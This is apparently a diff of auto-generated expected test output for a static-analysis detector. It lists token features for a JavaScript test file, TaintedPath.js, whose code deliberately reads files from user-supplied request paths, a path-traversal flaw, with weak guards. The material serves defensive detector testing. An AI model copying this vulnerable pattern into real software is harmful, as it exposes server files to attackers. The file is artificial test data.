path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:16:15:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:16:15:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:29:15:41 | "/home/user/" | stringConcatenatedWith | -endpoint- path | | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | calleeImports | fs | @@ -4733,6 +58442,37 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:15:29:15:48 | "/home/user/" + path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:15:45:15:48 | path | stringConcatenatedWith | '/home/user/' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:21 | path.startsWith | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:21 | path.startsWith | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:21 | path.startsWith | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:21 | path.startsWith | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | exceptional return of path.st ... user/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | exceptional return of path.st ... user/") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | exceptional return of path.st ... user/") | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | exceptional return of path.st ... user/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | exceptional return of path.st ... user/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | path.st ... user/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | path.st ... user/") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | path.st ... user/") | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | path.st ... user/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:17:7:17:36 | path.st ... user/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:17:12:17:21 | startsWith | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:12:17:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:17:12:17:21 | startsWith | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:17:12:17:21 | startsWith | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:17:12:17:21 | startsWith | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | calleeImports | url | @@ -4742,6 +58482,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:17:23:17:35 | "/home/user/" | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:9 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:9 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:9 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:9 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:9 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:15 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:15 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:15 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:15 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:15 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:7:18:38 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:11:18:15 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:11:18:15 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:11:18:15 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:11:18:15 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:11:18:15 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:18 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:18 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:18 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:18 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:31 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:31 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:31 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:31 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:31 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4750,6 +58530,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:18:17:18:37 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:18:20:18:31 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:20:18:31 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:18:20:18:31 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:18:20:18:31 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:18:20:18:31 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | calleeImports | fs | @@ -4759,6 +58544,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:18:33:18:36 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | exceptional return of path.in ... ecret") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | exceptional return of path.in ... ecret") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | exceptional return of path.in ... ecret") | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | exceptional return of path.in ... ecret") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | exceptional return of path.in ... ecret") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | path.in ... ecret") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | path.in ... ecret") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:20:7:20:28 | path.in ... ecret") | enclosingFunctionBody | req res path 